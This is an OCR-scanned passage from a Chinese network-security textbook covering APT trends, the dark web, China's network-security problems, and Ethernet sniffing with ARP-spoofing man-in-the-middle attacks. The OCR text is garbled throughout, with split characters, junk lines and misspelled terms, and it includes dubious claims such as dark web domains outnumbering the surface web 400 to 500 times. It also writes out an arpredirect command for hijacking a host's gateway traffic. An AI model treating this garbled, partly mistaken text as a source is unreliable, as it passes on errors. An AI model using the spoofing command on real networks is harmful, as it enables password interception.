作 、 攻 击 时 间 点 往往 发 生 在 行业 会 议 或 国内 重大 节假日 期 间 。 攻 击 者 发 送 鱼 又 邮件 主要 
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使 用 国内 第 三 方 邮件 服务 商 ， 通 过 Web 邮箱 发 送 。 附 件 压 缩 包 以 RAR 为 主 。 同 时 ， 攻 
击 者 与 中 国安 全 厂商 进行 了 大 量 持续 的 攻防 对 抗 ， 特 别 是 针对 360 等 安全 厂商 的 安全 产 
品 。 另 一 方面 ， 所 窃取 的 数据 关注 WPS 等 中 国 特有 的 办 公 软 件 ， 而 在 注册 C&C 域名 的 
时 候 ， 更 倾向 采用 具备 中 国 元 素 的 关键 字 。 

APT 攻击 发 展 趋势 主要 有 : APT 组 织 的 攻击 目标 方面 ， 将 会 持续 以 政治 、 经 济 、 科 
技 、 军 工 等 热点 相关 的 行业 或 机 构 为 攻击 目标 ， 如 十 三 五 规划 、 一 带 一 路 等 相关 领域 ， 
由 商业 竞争 产生 的 APT 攻击 将 不 断 增加 ， 另 外 针对 非 Windows 的 攻击 出 现 频 率 将 会 持 
续 增高 ，APT 组 织 的 攻击 手法 方面 ， 安 全 威胁 越 来 越 难 “看 见 ”， 同 时 针对 安全 行业 将 
从 被 动 隐匿 过 渡 到 主动 出 击 ; 最 后 在 反 APT 领域 ， 针 对 中 国 的 APT 攻击 将 越 来 越 多 的 
被 曝光 ， 另 外 反 APT 领域 相关 机 构 厂 商 将 协作 防守 。 


3.2.3 W 


3.2.3.1 ” 暗 网 简介 


暗 网 ( 深 网 ， 不 可 见 网 ， 隐 藏 网 ) 是 指 那些 存储 在 网 络 数据 库 里 、 不 能 通过 超 链接 
访问 而 需要 通过 动态 网 页 技术 访问 的 资源 集合 ， 不 属于 那些 可 以 被 标准 搜索 引擎 索引 的 
gg 

克 尔 。 伯 格 曼 将 当今 互联 网 上 的 搜索 服务 比喻 为 像 在 地 球 的 海洋 表面 的 拉 起 一 个 
ee a aaia e ag eA 
信息 由 于 隐藏 在 深 处 而 被 搜索 引擎 错失 掉 。 绝 大 部 分 这 些 隐藏 的 信息 是 须 通 过 动态 请 求 
产生 的 网 页 信息 ， 而 标准 的 搜索 引擎 却 无 法 对 其 进行 查找 。 传 统 的 搜索 引擎 “看 ”不 到 ， 
也 获取 不 了 这 些 存 在 于 暗 网 的 内 容 ， 除 非 通过 特定 的 搜查 这 些 页 面 才 会 动态 产生 。 于 是 
相对 的 ， 暗 网 就 隐藏 了 起 来 。 

如 图 3-33 所 示 ， 网 络 其 实 有 三 层 : 

(1) 表层 网 络 : 表层 网 就 是 人 们 所 熟知 的 可 见 网 络 ， 不 过 其 实 它 只 占 到 整个 网 络 的 
4% 到 20%, 人 们 平时 访问 的 就 是 这 类 网 络 。 通 过 链接 抓 取 技 术 就 可 以 轻松 访问 这 些 网 页 。 

谷歌 、 必 应 和 百度 等 搜索 引擎 是 访问 这 些 网 站 的 主力 ， 除 此 之 外 不 需要 其 他 额外 的 
工具 或 特殊 的 算法 。 总 而 言 之 ， 通 过 搜索 引擎 获得 的 搜索 结果 都 是 已 经 存储 在 其 数据 库 
中 的 超 链接 索引 。 

(2) RA: 表层 网 之 外 的 所 有 网 络 都 称 之 为 深 网 ， 搜 索引 擎 无 法 对 其 进行 抓 取 。 其 
并 没有 完全 隐藏 起 来 ， 只 是 普通 搜索 引擎 无 法 发 现 其 行踪 。 不 过 使 用 某 些 工具 后 访问 它 
也 不 是 什么 难事 。 

深 网 与 表面 网 是 一 对 共生 的 兄弟 ， 但 它们 的 性 格 却 恰恰 相反 ， 不 过 也 是 整个 网 络 平 
台 的 一 个 有 趣 的 存在 。 这 部 分 网 络 也 有 很 多 网 页 , 但 需要 多 走 几 步 才能 发 现 它们 的 踪迹 。 
暗 网 是 深 网 的 一 个 分 支 ， 平 时 这 两 个 名 词 是 可 以 互 换 的 ， 不 过 也 有 差别 ， 另 外 ， 它 也 是 
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IoE (万 物 互联 IntemetofEverything) 不 断 发 展 的 衍生 品 之 一 。 


网 络 : 触手 可 及 | 
i re 


PedoPlanet I 
Hard Candy 


wed TorChar 


Hidden Wiki P n n _ 
-此 专门 的 工具 


OnionlB 


图 3-33 表层 网 络 和 深 网 


对 于 深 网 来 说 ， 那 些 可 以 访问 的 部 分 是 没有 秘密 可 言 的 。 只 是 平时 所 使 用 的 表面 网 
下 薄 薄 的 一 层 。 

(3) 暗 网 : 暗 网 是 深 网 的 一 部 分 ， 但 被 人 为 地 隐藏 了 起 来 。 如 果 不 是 技术 大 牛 ， 很 
难 打 入 这 个 网 络 之 中 。 它 也 是 网 络 最 臭名 昭著 的 部 分 ， 许 多 你 不 敢 想象 的 坏事 就 在 这 里 
上 演 。 它 的 域名 数量 甚至 是 表面 网 的 400 到 500 倍 。 

暗 网 的 内 容 被 人 为 地 隐藏 了 , 它 成 了 互联 网 最 神秘 的 部 分 。 这 层 网 络 有 些 是 合法 的 ， 
但 有 些 却 被 政府 暗地里 用 来 搞 一 些 间谍 活动 ， 还 有 许多 都 有 着 不 可 告 人 的 秘密 。 

- 般 来 说 暗 网 都 使 用 特定 编码 关键 词 技术 ， 只 有 通过 这 一 技术 才能 摸 着 它 的 边缘 部 

分 。 另 外 ， 无 法 通过 子 域名 链接 到 这 类 网 站 ， 任 何 的 搜索 算法 都 对 它们 束手无策 。 比 如 
“/image/camaro_black.gif”， 就 是 暗 网 的 一 部 分 ， 这 个 博客 一 直 在 更 新 ， 但 公众 无 法 看 到 
它 ; 或 者 公开 发 表 了 一 些 博 客 ， 但 却 无 法 对 其 进行 引用 。 它 一 直 都 存在 ， 但 如 果 你 不 知 
道 它 特殊 的 URL (UniformResourceLocator， 统 一 资源 定位 符 )， 就 永远 找 不 到 它 。 

另 一 种 就 是 通过 改变 标题 来 改变 网 页 。 根 据 访 问 方 式 的 不 同 ， 同 样 的 标题 下 会 隐藏 
着 内 容 完全 不 同 的 网 页 ， 这 样 网 页 就 一 定 程度 上 隐形 了 。 

另外 , 虚拟 网 络 也 是 瞳 网 的 一 种 表现 形式 , 因为 同样 需要 借助 特殊 的 软件 进行 访问 。 
不 过 这 种 行为 多 数 都 是 合法 的 ， 满 足 了 人 们 对 公司 网 络 远程 进行 访问 的 需求 。 不 过 也 有 
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人 利用 洋葱 路 由 器 OnionRouter 或 者 PP (JInvisibleImternetProject) 等 工具 通过 虚拟 网 络 
对 上 暗 网 的 核心 进行 探索 。 
3.2.3.2 ”上 暗 网 的 威胁 

由 于 暗 网 的 高 度 隐 蔽 性 ， 因 此 有 些 人 还 利用 暗 网 做 一 些 不 法 勾当 ， 比 如 泄露 敏感 信 
息 、 洗 钱 、 贩 卖 违禁 药品 、 枪 支 、 被 窃 信用 卡 账号 、 假 币 或 者 伪造 的 身份 证 、 黑 客 工具 
和 毒品 交易 、 人 口 贩 卖 和 儿童 色情 等 等 。 人 们 会 做 这 些 交易 。 利 用 这 些 网 络 的 法 外 之 地 ， 
执法 部 门 或 者 政府 部 门 就 可 以 不 留 痕迹 地 对 可 疑 的 网 站 或 服务 进行 审查 。 不 幸 的 是 ， 有 
HEGEL TS ABER 

在 中 国 ， 这 些 暗 网 则 用 来 对 抗 政府 的 审查 。 不 过 在 西方 国家 真正 值得 关心 的 还 是 那 
些 利用 暗 网 进行 的 有 组 织 犯罪 ， 而 这 一 领域 的 监管 还 是 空白 。 甚 至 目前 还 出 现 了 专用 的 
搜索 引擎 能 更 简单 的 帮 你 找到 那些 非法 网 站 ， 而 之 前 这 些 网 站 很 隐秘 ， 只 有 知道 完整 的 
网 站 URL 才能 访问 。 换 句 话 来 说 ， 它 可 以 像 普通 搜索 引擎 一 样 工 作 ， 但 找到 的 网 站 “更 
劲爆 ”。 

比特 币 成 为 暗 网 市 场 的 主要 流通 货币 。 比 特 币 在 给 人 们 带 来 便利 的 同时 ， 也 在 催生 
更 多 洗钱 犯罪 分 子 。 邮 件 成 为 暗 网 市 场 的 主要 通信 方式 。 对 于 卖家 而 言 ， 来 自 客户 的 高 
评分 是 命根 子 。 商 家 的 信誉 尤其 重要 。 暗 网 经 济 的 发 展 ， 带 动 了 一 批 产 业 链 服务 的 发 展 ， 
如 : 隐匿 服务 器 、 隐 藏 邮箱 、 邮 寄 服 务 等 等 。 网 络 经 济 不 断 发 展 的 同时 也 带动 了 瞳 网 经 
济 的 发 展 ， 暗 网 中 的 非法 交易 不 断 增 加 ， 让 更 多 的 人 走 上 犯罪 道路 ， 网 络 犯 罪 正 以 更 多 
的 方式 日 渐 影响 个 人 和 企业 的 运行 。 

同时 ， 来 自 瞳 网 的 攻击 现在 也 让 人 措手不及 ， 恶 意 软件 、 病 毒 、 后 门 、DoS 攻击 测 
涌 而 来 ， 黑 客 们 可 一 点 都 不 手软 。 另 外 ， 随 着 IoE 的 扩张 ， 黑 客 的 攻击 次 数 会 呈 儿 何 级 
增长 。 而 且 这 些 来 自 暗 网 的 攻击 行踪 诡秘 ， 对 安全 人 员 的 工作 造成 了 很 大 的 挑战 。 

下 面 是 一 些 黑客 利用 暗 网 展开 的 行动 : 

。 招募 黑客 

。 盗窃 竞争 对 手 的 产品 设计 和 知识 产权 并 进行 伪造 

。 通过 漏洞 对 被 黑 账 户 进行 盗窃 

。 联合 其 他 黑客 对 别 的 网 站 进行 攻击 

。 召开 黑客 论坛 

事实 上 暗 网 永远 都 会 是 心腹 大 患 。 只 要 IoE 还 存在 ， 黑 客 就 可 以 通过 暗 网 对 新 的 设 
备 进行 攻击 ， 人 们 只 能 被 动 地 进行 抵抗 。 由 于 社会 的 忽视 ， 瞳 网 带 来 的 威胁 变 得 越 来 越 
严重 。 未 来 几 年 内 暗 网 会 得 到 更 大 的 发 展 ， 成 为 黑客 活动 或 其 他 犯罪 活动 的 温床 。 


3.3 ”网络 安全 威胁 


网 络 安全 是 信息 安全 的 核心 。 网 络 作为 信息 的 主要 收集 、 存 储 、 分 配 、 传 输 、 应 用 
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的 载体 ， 其 安全 对 整个 信息 的 安全 起 着 至 关 重 要 甚至 是 决定 性 的 作用 。 网 络 安全 的 基础 
是 需要 具有 安全 的 网 络 体系 结构 和 网 络 通信 协议 。 但 遗憾 的 是 ， 今 天 的 Intemet 不 论 是 
其 体系 结构 还 是 通信 协议 ， 都 具有 各 种 各 样 的 安全 漏洞 ， 因 此 而 带 来 的 安全 事故 层 出 不 
穷 。 当 然 ， 任 何 一 种 体系 结构 和 通信 协议 ， 都 不 可 能 尽善尽美 、 没 有 漏洞 ， 因 此 利用 网 
络 进行 的 攻击 与 反攻 击 、 控 制 与 反 控制 永远 不 会 停止 。 


3.3.1 网络 安全 现状 


随 着 信息 化 进程 的 深入 和 互联 网 的 迅速 发 展 ， 人 们 的 工作 、 学 习 和 生活 方式 正在 发 
生 巨 大 变化 ， 效 率 大 为 提高 ， 信 息 资 源 得 到 最 大 程度 的 共享 。 但 必须 看 到 ， 紧 随 信息 化 
发 展 而 来 的 网 络 安全 问题 日 渐 凸 出 ， 如 果 不 很 好 地 解决 这 个 问题 ， 必 将 阻碍 信息 化 发 展 
的 进程 。 
3.3.1.1 网 络 安全 问题 的 产生 

可 以 从 不 同 角 度 对 网 络 安全 作出 不 同 的 解释 。 一 般 意义 上 ， 网 络 安全 是 指 信 息 安 全 
和 控制 安全 两 部 分 。 国 际 标准 化 组 织 把 信息 安全 定义 为 “信息 的 完整 性 、 可 用 性 、 保 密 
性 和 可 靠 性 党 控制 安全 则 指 身份 认 证 、 不 可 否认 性 、 授 权 和 访问 控制 。 

互联 网 与 生 俱 有 的 开放 性 、 交 互 性 和 分 散 性 特征 使 人 类 所 昼 慑 的 信息 共享 、 开 放 、 
灵活 和 快速 等 需求 得 到 满足 。 网 络 环境 为 信息 共享 、 信 息 交 流 、 信 息 服 务 创造 了 理想 空 
间 ， 网 络 技术 的 迅速 发 展 和 广泛 应 用 ， 为 人 类 社会 的 进步 提供 了 巨大 推动 力 。 然 而 ， 正 
是 由 于 互联 网 的 上 述 特 性 ， 产 生 了 许多 安全 问题 : 

O 信息 泄露 、 信 息 污染 、 信 息 不 易 受 控 。 例 如 ， 资 源 未 授权 侵 用 、 未 授权 信息 流 
出 现 、 系 统 拒绝 信息 流 和 系统 否认 等 ， 这 些 都 是 信息 安全 的 技术 难点 。 

@ 在 网 络 环境 中 ， 一 些 组 织 或 个 人 出 于 某 种 特殊 目的 ， 进 行 信息 泄密 、 信 息 破 坏 、 
信息 侵权 和 意识 形态 的 信息 渗透 ， 甚 至 通过 网 络 进行 政治 颠覆 等 活动 ， 使 国家 利益 、 社 
会 公共 利益 和 各 类 主体 的 合法 权益 受到 威胁 。 

© 网 络 运用 的 趋势 是 全 社会 广泛 参与 ， 随 之 而 来 的 是 控制 权 分 散 的 管理 问题 。 由 
于 人 们 利益 、 目 标 、 价 值 的 分 歧 ， 使 信息 资源 的 保护 和 管理 出 现 脱节 和 真空 ， 从 而 使 信 
息 安 全 问题 变 得 广泛 而 复杂 。 

© 随 着 社会 重要 基础 设施 的 高 度 信息 化 ， 社 会 的 “命脉 ”和 核心 控制 系统 有 可 能 
面临 恶意 攻击 而 导致 损坏 和 瘫痪 ， 包 括 国防 通信 设施 、 动 力 控制 网 、 金 融 系统 和 政府 网 
站 等 。 
3.3.1.2 ”我 国 网 络 安全 问题 日 益 突出 

目前 ， 我 国 网 络 安全 问题 日 益 突出 的 主要 标志 是 : 

@ 计算 机 系统 遭受 病毒 感染 和 破坏 的 情况 相当 严重 。 据 国家 计算 机 病毒 应 急 处 理 
中 心 有 关 资料 表明 ， 从 国家 计算 机 病毒 应 急 处 理 中心 日 常 监测 结果 看 来 ， 计 算 机 病毒 呈 
现 出 异常 活跃 的 态势 。 
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@ 电脑 黑客 活动 已 形成 重要 威胁 。 网 络 信息 系统 具有 致命 的 脆弱 性 、 易 受 攻击 性 
和 开放 性 ， 从 国内 情况 来 看 ， 目 前 我 国 95% 与 互联 网 相连 的 网 络 管理 中 心 都 遭受 过 境内 
外 黑客 的 攻击 或 侵入 ， 其 中 银行 、 金 融和 证 券 机 构 是 黑客 攻击 的 重点 。 

@ 信息 基础 设施 面临 网 络 安全 的 挑战 。 面 对 信息 安全 的 严峻 形势 ， 我 国 的 网 络 安 
全 系统 在 预测 、 反 应 、 防 范 和 恢复 能 力 方 面 存在 许多 薄弱 环节 。 据 英国 《 简 氏 战略 报告 》 
和 其 他 网 络 组 织 对 各 国信 息 防 护 能 力 的 评估 ， 我 国 被 列 入 防护 能 力 最 低 的 国家 之 一 ， 不 
仅 大 大 低 于 美国 、 俄 罗斯 和 以 色 列 等 信息 安全 强国 ， 而 且 排 在 印度 、 韩 国之 后 。 近 年 来 ， 
国内 与 网 络 有 关 的 各 类 违法 行为 以 每 年 30% 的 速度 递增 。 

© 网 络 政治 颠覆 活动 频繁 。 近 年 来 ， 国 内 外 反动 势力 利用 互联 网 组 党 结社 ， 进 行 
针对 我 国 党 和 政府 的 非法 组 织 和 串联 活动 ， 猩 狐 频 繁 ， 屡 禁 不 止 。 尤 其 是 一 些 非法 组 织 
有 计划 地 通过 网 络 渠道 ， 宣 传 异 教 屠 说， 妄图 扰乱 人 心 ， 扰 乱 社 会 秩序 。 例 如 ， 据 媒体 
报道 ,“ 法 轮 功 ” 非 法 组 织 就 是 在 美国 设 网 站 ， 利 用 无 国界 的 信息 空间 进行 反 政 府 活动 。 
3.3.13 制约 提高 我 国 网 络 安全 防范 能 力 的 因素 

当前 ， 制 约 我 国 提高 网 络 安全 防御 能 力 的 主要 因素 有 以 下 几 方面 。 

1. 缺乏 自主 的 计算 机 网 络 和 软件 核心 技术 

我 国信 息 化 建设 过 程 中 缺乏 自主 技术 支撑 。 计 算 机 安全 存在 三 大 黑洞 : CPU 芯片 、 
操作 系统 和 数据 库 、 网 关 软 件 大 多 依赖 进口 。 信 息 安全 专家 、 中 国 科学 院 高 能 物理 研究 
所 研究 员 许 榕 生 曾 一 针 见 血 地 点 出 我 国信 息 系统 的 要 害 :“ 我 们 的 网 络 发 展 很 快 ,但 安全 
状况 如 何 ? 现在 有 很 多 人 投 很 多 钱 去 建 网 络 ， 实 际 上 并 不 清楚 它 只 有 一 半 根 基 ， 建 的 是 
没有 防范 的 网 。 有 的 网 络 顾 问 公 司 建 了 很 多 网 ， 市 场 布 好 ， 但 建 的 是 裸 网 ， 没 有 保护 ， 
就 像 房产 公司 盖 了 很 多 楼 , 门窗 都 不 加 锁 就 交付 给 业主 去 住 ,。 ”我国 计算 机 网 络 所 使 用 的 
网 管 设备 和 软件 基本 上 是 舶 来 品 ， 这 些 因素 使 我 国 计 算 机 网 络 的 安全 性 能 大 大 降低 ， 被 
认为 是 易 宕 视 和 易 打击 的 “玻璃 网 ”由 于 缺乏 自主 技术 , 我 国 的 网 络 处 于 被 窃听 、 干 扰 、 
监视 和 欺诈 等 多 种 信息 安全 威胁 中 ， 网 络 安全 处 于 极 脆弱 的 状态 。 

2. 安全 意识 淡薄 是 网 络 安全 的 瓶颈 

目前 ， 在 网 络 安全 问题 上 还 存在 不 少 认 知 盲区 和 制约 因素 。 网 络 是 新 生 事物 ， 许 多 
人 一 接触 就 忙 着 用 于 学 习 、 工 作 和 娱乐 等 ， 对 网 络 信息 的 安全 性 无 暇 顾及 ， 安 全 意识 相 
当 淡 薄 ， 对 网 络 信息 不 安全 的 事实 认识 不 足 。 与 此 同时 ， 网 络 经 营 者 和 机 构 用 户 注重 的 
是 网 络 效应 ， 对 安全 领域 的 投入 和 管理 远 远 不 能 满足 安全 防范 的 要 求 。 总 体 上 看 ， 网 络 
信息 安全 处 于 被 动 的 封 堵 漏 洞 状态 ， 从 上 到 下 普遍 存在 侥幸 心理 ， 没 有 形成 主动 防范 、 
积极 应 对 的 全 民意 识 ， 更 无 法 从 根本 上 提高 网 络 监测 、 防 护 、 响 应 、 恢 复 和 抗击 能 
近年 来 ， 国 家 和 各 级 职能 部 门 在 信息 安全 方面 已 做 了 大 量 努 力 ， 但 就 范围 、 影 响 和 效果 
来 讲 ,迄今 所 采取 的 信息 安全 保护 措施 和 有 关 计 划 还 不 能 从 根本 上 解决 目前 的 被 动 局 面 ， 
整个 信息 安全 系统 在 迅速 反应 、 快 速 行动 和 预警 防范 等 主要 方面 ， 缺 少 方向 感 、 敏 感度 
和 应 对 能 力 。 
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3. 运行 管理 机 制 的 缺陷 和 不 足 制 约 了 安全 防范 的 力度 

运行 管理 是 过 程 管理 ， 是 实现 全 网 安全 和 动态 安全 的 关键 。 有 关 信 息 安 全 的 政策 、 
计划 和 管理 手段 等 最 终 都 会 在 运行 管理 机 制 上 体现 出 来 。 就 目前 的 运行 管理 机 制 来 看 ， 
有 以 下 几 方 面 的 缺陷 和 不 足 。 

O 网 络 安全 管理 方面 人 才 匮 乏 ; 由 于 互联 网 通信 成 本 极 低 ， 分 布 式 客户 服务 器 和 
不 同 种 类 配置 不 断 出 新 和 发 展 。 按理， 由 于 技术 应 用 的 扩展 , 技术 的 管理 也 应 同步 扩展 ， 
但 从 事 系 统管 理 的 人 员 却 往往 并 不 具备 安全 管理 所 需 的 技能 、 资 源 和 利益 导向 。 信 息 安 
全 技术 管理 方面 的 人 才 无 论 是 数量 还 是 水 平 ， 都 无 法 适应 信息 安全 形势 的 需要 。 

@ 安全 措施 不 到 位 : 互联 网 越 来 越 具有 综合 性 和 动态 性 特点 ， 这 同时 也 是 互联 网 
不 安全 因素 的 原因 所 在 。 然 而 ， 网 络 用 户 对 此 缺乏 认识 ， 未 进入 安全 就 绪 状 态 就 急于 操 
作 ， 结 果 导致 敏感 数据 暴露 ， 使 系统 遭受 风险 。 配 置 不 当 或 过 时 的 操作 系统 、 邮 件 程序 
和 内 部 网 络 都 存在 入 侵 者 可 利用 的 缺陷 ， 如 果 缺 乏 周密 有 效 的 安全 措施 ， 就 无 法 发 现 和 
及 时 查 堵 安 全 漏洞 。 当 厂商 发 布 补丁 或 升级 软件 来 解决 安全 问题 时 ， 许 多 用 户 的 系统 不 
进行 同步 升级 ， 原 因 是 管理 者 未 充分 意识 到 网 络 不 安全 的 风险 所 在 ， 未 引起 重视 。 

@ 缺乏 综合 性 的 解决 方案 : 面 对 复 杂 的 不 断 变化 的 互联 网 世界 ， 大 多 数 用 户 缺 乏 
综合 性 的 安全 管理 解决 方案 ， 稍 有 安全 意识 的 用 户 越 来 越 依赖 “ 银 弹 ”方案 (如 防火 墙 
和 加 密 技术 )， 但 这 些 用户 也 就 此 产生 了 虚假 的 安全 感 ， 渐 渐 丧 失 警 惕 。 实 际 上 ， 一 次 性 
使 用 一 种 方案 并 不 能 保证 系统 一 劳 永 逸 和 高 枕 无 忧 ， 网 络 安全 问题 远 远 不 是 防毒 软件 和 
防火 墙 能 够 解决 的 ， 也 不 是 大 量 标准 安全 产品 简单 堆砌 就 能 解决 的 。 近 年 来 ， 国 外 的 一 
些 互 联网 安全 产品 厂商 及 时 应 变 ， 由 防 病毒 软件 供应 商 转变 为 企业 安全 解决 方案 的 提供 
者 ， 他 们 相继 在 我 国 推出 多 种 全 面 的 企业 安全 解决 方案 ， 包 括 风 险 评估 和 漏洞 检测 、 入 
侵 检测 、 防 火 墙 和 虚拟 专用 网 、 防 病毒 和 内 容 过 滤 解 决 方案 ， 以 及 企业 管理 解决 方案 等 
一 整套 综合 性 安全 管理 解决 方案 。 

4. 缺乏 制度 化 的 防范 机 制 

不 少 单位 没有 从 管理 制度 上 建立 相应 的 安全 防范 机 制 ， 在 整个 运行 过 程 中 ， 缺 乏 行 
之 有 效 的 安全 检查 和 应 对 保护 制度 。 不 完善 的 制度 滋长 了 网 络 管理 者 和 内 部 人 士 自身 的 
违法 行为 。 许 多 网 络 犯罪 行为 (尤其 是 非法 操作 ) 都 是 因为 内 部 联网 电脑 和 系统 管理 制 
度 疏 于 管理 而 得 偿 的 。 同 时 ， 政 策 法 规 难 以 适应 网 络 发 展 的 需要 ， 信 息 立法 还 存在 相当 
多 的 空白 。 个 人 隐私 保护 法 、 数 据 库 保 护法 、 数 字 媒 体 法 、 数 字 签 名 认证 法 、 计 算 机 犯 
罪 法 以 及 计算 机 安全 监管 法 等 信息 空间 正常 运作 所 需 的 配套 法 规 尚 不 健全 。 由 于 网 络 作 
案 手 段 新 、 时 间 短 、 不 留 痕迹 等 特点 ， 给 侦破 和 审理 网 上 犯罪 案件 带 来 极 大 困难 。 

总 的 说 来 ， 网 络 环境 的 复杂 性 、 多 变性 ， 以 及 信息 系统 的 脆弱 性 ， 决 定 了 网 络 安全 
威胁 的 客观 存在 。 我 国 日 益 开放 并 融入 世界 ， 加 强 安全 监管 和 建立 保护 屏障 不 可 或 缺 。 


3.3.2 网络 监听 
网 络 监听 作为 一 种 发 展 比 较 成 熟 的 技术 ， 在 协助 网 络 管理 员 监 测 网 络 传输 数据 ， 排 
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除 网 络 故障 等 方面 具有 不 可 替代 的 作用 。 然 而 ， 在 另 一 方面 网 络 监听 也 给 以 太 网 安全 带 
来 了 极 大 的 隐患 ， 许 多 的 网 络 入 侵 往 往 都 伴随 着 以 太 网 内 网 络 监听 行为 ， 从 而 造成 口令 
失窃 ， 敏 感 数据 被 截获 等 等 连锁 性 安全 事件 。 网 络 监 听 的 目的 是 截获 通信 的 内 容 ， 监 听 
的 手段 是 对 协议 进行 分 析 。 
3.3.2.1 ”共享 以 太 网 的 工作 原理 

一 台 连 接 在 以 太 网 内 的 计算 机 为 了 能 跟 其 他 主机 进行 通信 ， 需 要 有 网 卡 支持 。 网 卡 
有 几 种 接收 数据 帧 的 状态 ， 如 unicast, broadcast, multicast, promiscuous 等 ，unicast 是 
指 网 卡 在 工作 时 接收 目的 地 址 是 本 机 硬件 地 址 的 数据 帧 。Broadcast 是 指 接收 所 有 类 型 为 
广播 报 文 的 数据 帧 。Multicast 是 指 接收 特定 的 组 播报 文 。Promiscuous 即 混杂 模式 ， 是 指 
对 报 文中 的 目的 硬件 地 址 不 加 任何 检查 ， 全 部 接收 的 工作 模式 。 以 太 网 逻辑 上 是 总 线 拓 
扑 结构 ， 采 用 广播 的 通信 方式 。 数 据 的 传输 是 依靠 帧 中 的 MAC 地 址 来 寻找 目的 主机 。 
只 有 与 数据 帧 中 目标 地 址 一 致 的 那 台 主 机 才能 接收 数据 〈 广 播 帧 除外 ， 它 永远 都 是 发 送 
到 所 有 的 主机 )。 但 是 ， 当 网 卡 工作 在 混杂 模式 下 时 ， 无 论 帧 中 的 目标 物理 地 址 是 什么 ， 
主机 都 将 接收 。 如 果 在 这 台 主 机 上 安装 监听 软件 ， 就 可 以 达到 监听 的 目的 ， 如 图 3-34 
所 示 。 


发 送 目标 MAC 是 Me 


a 的 报 文 
3 


< d -a 


= 


MAC: Ma MAC: Mb MAC: Mc MAC: Md 
Class: unicast Class: multicast Class: broadcast Class: Promiscuous 
混杂 模式 主机 收 
到 报 文 


图 3-34 以太 网 网 卡 工作 模式 


3.3.2.2 Sniffer 〈 嗅 探 器 ) 

Sniffer 是 一 种 在 网 络 上 非常 流行 的 软件 ， 它 的 正当 用 处 主要 是 分 析 网 络 的 流量 ， 以 
便 找 出 所 关心 的 网 络 中 潜在 的 问题 ， 所 以 它 对 于 网 络 管理 员 来 说 是 非常 重要 的 。 但 是 ， 
由 于 Sniffer 可 以 捕获 网 络 报 文 ， 因 此 它 对 网 络 也 存在 着 极 大 的 危害 。 
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1. Sniffer 工作 前 提 

Sniffer 主要 是 捕获 到 达 本 机 端口 的 报 文 。 如 果 要 想 完 成 监听 ， 即 捕获 网 段 上 所 有 的 
报 文 ， 前 提 条 件 是 : @ 网 络 必须 是 共享 以 太 网 。@ 把 本 机 上 的 网 卡 设置 为 混杂 模式 。 

2. Sniffer 的 分 类 

Sniffer 分 为 软件 和 硬件 两 种 ， 软 件 的 Sniffer 如 NetXray, Packetboy, Netmonitor 等 
等 ， 软 件 Sniffer 的 优点 是 物美 价 廉 ， 易 于 学 习 使 用 ， 同 时 也 易于 交流 ， 缺 点 是 无 法 抓 取 
网 络 上 所 有 的 传输 , 某 些 情况 下 也 就 无 法 真正 了 解 网 络 的 故障 和 运行 情况 。 硬 件 的 Sniffer 
通常 称 为 协议 分 析 仪 ， 一 般 都 是 商业 性 的 ， 价 格 也 比较 贵 。 本 书 所 讲 的 Sniffer 指 的 是 软 
件 ， 它 把 包 抓 取 下 来 ， 然 后 查看 其 中 的 内 容 ， 可 以 得 到 密码 等 。Sniffer 只 能 抓 取 一 个 物 
理 网 段 内 的 包 ， 就 是 说 监听 者 与 监听 的 目标 中 间 不 能 有 路 由 交换) 或 其 他 屏蔽 广播 包 
的 设备 。 所 以 对 一 般 拨号 上 网 的 用 户 来 说 ， 是 不 可 能 利用 Sniffer 来 窃听 到 其 他 人 的 通信 
内 容 的 。 

3. 网 络 监听 的 目的 

当 黑 客 成 功 地 登录 进 一 台 网 络 上 的 主机 ， 并 取得 了 超级 用 户 权 限 之 后 ， 而 且 还 想 利 
用 这 台 主 机 去 攻击 同一 网 段 上 的 其 他 主机 时 ， 他 就 会 在 这 人 台 主 机 上 安装 Sniffer 软件 ， 对 
以 太 网 上 传送 的 数据 包 进 行 侦 听 ， 从 而 发 现 感 兴趣 的 包 。 如 果 发 现 符合 条 件 的 包 ， 就 把 
它 存 到 一 个 Log 文件 中 去 。 通 常设 置 的 这 些 条 件 是 包含 字 “usemame” 或 “password” 
的 包 ， 这 样 的 包 里 面 通 常 有 黑客 感 兴趣 的 密码 之 类 的 东西 。 一 旦 黑客 截获 得 了 某 台 主机 
的 密码 ， 他 就 会 立刻 进入 这 台 主 机 。 
3.3.2.3 ”交换 式 网络 上 的 嗅 探 

交换 以 太 网 中 ， 交 换 机 能 根据 数据 帧 中 的 目的 MAC 地 址 将 数据 帧 准确 地 送 到 目的 
主机 的 端口 , 而 不 是 所 有 的 端口 。 所 以 交换 式 网 络 环境 在 一 定 程度 上 能 抵御 Sniffer 攻击 。 
但 是 在 交换 式 网 络 上 同样 会 有 Sniffer 的 攻击 。 在 交换 环境 中 ，Sniffer 的 简单 的 做 法 就 是 
伪装 成 为 网 关 。 因 为 网 关 是 一 个 网 络 互 联 设备 ， 所 有 发 往 其 他 网 络 上 的 数据 报 文 都 必须 
由 网 关 来 转发 出 去 。 也 就 是 说 ， 所 有 发 入 其 他 网 络 的 数据 报 文 的 以 太 帧 的 目的 硬件 地 址 
都 是 指向 网 关 的 。 如 果 网 络 中 所 有 的 计算 机 都 把 安装 了 Sniffer 的 计算 机 当成 网 关 的 话 ， 
IGA Sniffer 同样 能 监听 到 网 络 中 的 数据 。 攻 击 系统 在 这 个 过 程 中 起 到 了 一 个 “中 间 人 ” 
的 作用 。 这 种 攻击 方式 也 被 称 为 “中 间 人 ”攻击 。 

交换 网 络 中 有 三 台 主 机 A、B、C, 了 PP 地 址 分 别 为 192.168.0.1、192.168.0.2、192.168.0.3， 
其 中 A 是 网 络 中 的 网 关 。C 是 入 侵 者 的 系统 。 在 正常 情况 下 ，C 是 无 法 收 到 A 与 B 之 间 
的 通信 报 文 的 。 入 侵 者 在 C 上 运行 ARP 欺骗 软件 ARPredirect， 它 是 dsniff 软件 中 的 一 
部 分 ， 可 以 利用 APR 欺骗 将 网 络 中 的 主机 发 送 的 数据 报 文 进行 重新 定向 ， 如 图 3-35 所 
示 。 操 作 APRredirect 非常 简单 ， 只 需要 下 面 这 样 一 条 命令 : 

ARPredirect_+192.168.0.2192.168.0.1 

ARPredirect 就 开始 发 送 假冒 的 ARP 应 答 给 B 告诉 B 网 关 就 是 C。B 会 刷新 自己 的 
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缓存 ,将 C 的 硬件 地 址 作为 网 关 的 硬件 地 址 保存 在 缓存 中 。 这 样 ， 当 B 需要 向 外 进行 会 
话 时 ， 会 将 数据 报 发 往 APR 缓存 的 网 关 地 址 ， 数 据 报 文 就 被 发 给 C。 而 C 中 打开 了 该 
